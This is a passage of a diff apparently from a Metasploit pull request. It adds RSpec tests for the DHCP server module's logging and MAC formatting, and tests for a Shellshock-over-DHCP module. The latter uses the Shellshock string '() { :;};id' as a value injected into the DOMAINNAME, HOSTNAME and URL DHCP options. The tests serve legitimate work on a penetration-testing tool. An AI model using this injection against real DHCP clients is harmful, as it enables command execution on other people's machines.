+        server_with_reporter.send(:dispatch_request, from, discover)
+        server_with_reporter.send(:dispatch_request, from, request)
+        request_event = events.find { |e| e[:type] == :dhcp_request }
+        expect(request_event[:ip]).to match(/\A\d+\.\d+\.\d+\.\d+\z/)
+      end
+    end
+
+    context 'on an unknown message type' do
+      it 'does not fire the reporter' do
+        pkt = dhcp_packet(99)
+        server_with_reporter.send(:dispatch_request, from, pkt)
+        expect(events).to be_empty
+      end
+    end
+
+    context 'when no reporter is registered' do
+      it 'does not raise on DHCPDISCOVER' do
+        srv = described_class.new(base_hash)
+        srv.sock = sock
+        pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover)
+        expect { srv.send(:dispatch_request, from, pkt) }.not_to raise_error
+      end
+
+      it 'does not raise on DHCPREQUEST' do
+        srv = described_class.new(base_hash)
+        srv.sock = sock
+        pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPRequest)
+        expect { srv.send(:dispatch_request, from, pkt) }.not_to raise_error
+      end
+    end
+  end
+
+  describe 'MAC address formatting' do
+    let(:sock) { instance_double(Rex::Socket::Udp, sendto: 1) }
+    let(:events) { [] }
+    let(:mac_server) do
+      srv = described_class.new(base_hash)
+      srv.sock = sock
+      srv.report { |e| events << e }
+      srv
+    end
+
+    it 'formats all-zeros MAC correctly' do
+      pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover, mac: "\x00" * 6)
+      mac_server.send(:dispatch_request, ['0.0.0.0', 68], pkt)
+      expect(events.first[:mac]).to eq('00:00:00:00:00:00')
+    end
+
+    it 'formats all-FF MAC correctly' do
+      pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover, mac: "\xff" * 6)
+      mac_server.send(:dispatch_request, ['0.0.0.0', 68], pkt)
+      expect(events.first[:mac]).to eq('ff:ff:ff:ff:ff:ff')
+    end
+
+    it 'zero-pads single-nibble bytes' do
+      pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover, mac: "\x01\x02\x03\x04\x05\x06")
+      mac_server.send(:dispatch_request, ['0.0.0.0', 68], pkt)
+      expect(events.first[:mac]).to eq('01:02:03:04:05:06')
+    end
+  end
+end

--- a/spec/modules/auxiliary/server/dhclient_bash_env_spec.rb
+++ b/spec/modules/auxiliary/server/dhclient_bash_env_spec.rb
@@ -1,0 +1,104 @@
+require 'rspec'
+require 'metasploit/framework'
+
+RSpec.describe 'auxiliary/server/dhclient_bash_env' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  subject(:mod) do
+    load_and_create_module(
+      module_type: 'auxiliary',
+      reference_name: 'server/dhclient_bash_env'
+    )
+  end
+
+  describe '#dhcp_vars' do
+    context 'with the default SHELLSHOCK_DHCP_VARS value' do
+      it 'returns all three variable names' do
+        expect(mod.dhcp_vars).to eq(%w[domainname hostname url])
+      end
+    end
+
+    context 'with a subset of valid var names' do
+      it 'returns only the specified names' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'domainname,url'
+        expect(mod.dhcp_vars).to eq(%w[domainname url])
+      end
+    end
+
+    context 'with a single valid var name' do
+      it 'returns a one-element array' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'hostname'
+        expect(mod.dhcp_vars).to eq(%w[hostname])
+      end
+    end
+
+    context 'with leading and trailing whitespace around entries' do
+      it 'strips whitespace from each name' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = ' domainname , url '
+        expect(mod.dhcp_vars).to eq(%w[domainname url])
+      end
+    end
+
+    context 'with an invalid var name' do
+      it 'raises with a bad-config message naming the offending var' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'domainname,evil'
+        expect { mod.dhcp_vars }.to raise_error(Msf::Auxiliary::Failed, /bad-config.*evil/)
+      end
+    end
+
+    context 'with multiple invalid var names' do
+      it 'lists all invalid names in the error message' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'bad1,hostname,bad2'
+        expect { mod.dhcp_vars }.to raise_error(Msf::Auxiliary::Failed, /bad1.*bad2|bad2.*bad1/)
+      end
+    end
+  end
+
+  describe '#build_dhcp_vars' do
+    let(:payload_value) { '() { :;};id' }
+
+    context 'with the default SHELLSHOCK_DHCP_VARS (all three)' do
+      it 'sets DOMAINNAME, HOSTNAME, and URL to the payload value' do
+        result = mod.build_dhcp_vars(payload_value)
+        expect(result).to eq(
+          'DOMAINNAME' => payload_value,
+          'HOSTNAME' => payload_value,
+          'URL' => payload_value
+        )
+      end
+    end
+
+    context 'with only domainname' do
+      it 'sets only DOMAINNAME' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'domainname'
+        result = mod.build_dhcp_vars(payload_value)
+        expect(result).to eq('DOMAINNAME' => payload_value)
+      end
+    end
+
+    context 'with only hostname' do
+      it 'sets only HOSTNAME' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'hostname'
+        result = mod.build_dhcp_vars(payload_value)
+        expect(result).to eq('HOSTNAME' => payload_value)
+      end
+    end
+
+    context 'with only url' do
+      it 'sets only URL' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'url'
+        result = mod.build_dhcp_vars(payload_value)
+        expect(result).to eq('URL' => payload_value)
+      end
+    end
+
+    context 'with hostname and url' do
+      it 'does not include DOMAINNAME' do
+        mod.datastore['SHELLSHOCK_DHCP_VARS'] = 'hostname,url'
+        result = mod.build_dhcp_vars(payload_value)
+        expect(result.keys).not_to include('DOMAINNAME')
+        expect(result).to include('HOSTNAME' => payload_value, 'URL' => payload_value)
+      end
+    end
+  end
+end


### PR DESCRIPTION
Related Issue: https://github.com/rapid7/metasploit-framework/issues/21121

This PR addresses:

- Able to be more verbose: 
  - Feedback when a client is trying to connect (DHCPDISCOVER), and then its been given an IP (DHCPREQUEST).
- Add the host using report_host()

## After

```console
$ msfconsole -q -x 'use auxiliary/server/dhcp;
set dhcpipstart 10.0.0.20;
set dhcpipend 10.0.0.25;
set netmask 255.255.255.0;
set broadcast 10.0.0.255;
set router 10.0.0.1;
set dnsserver 10.0.0.1;
set srvhost 10.0.0.1;
set DHCPINTERFACE tap0;
set verbose true; 
workspace -D;
run'
dhcpipstart => 10.0.0.20
dhcpipend => 10.0.0.25
netmask => 255.255.255.0
broadcast => 10.0.0.255
router => 10.0.0.1
dnsserver => 10.0.0.1
srvhost => 10.0.0.1
DHCPINTERFACE => tap0
verbose => true
[*] Deleted workspace: default
[*] Recreated the default workspace
[*] Auxiliary module running as background job 0.
msf auxiliary(server/dhcp) >
[*] Starting DHCP server...
msf auxiliary(server/dhcp) >
msf auxiliary(server/dhcp) >
msf auxiliary(server/dhcp) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.21

msf auxiliary(server/dhcp) > hosts

Hosts
=====

address    mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---                ----  -------  ---------  -----  -------  ----  --------
10.0.0.21  52:54:00:12:34:56                                                  Added from DHCP: auxiliary/server/dhcp

msf auxiliary(server/dhcp) >
```
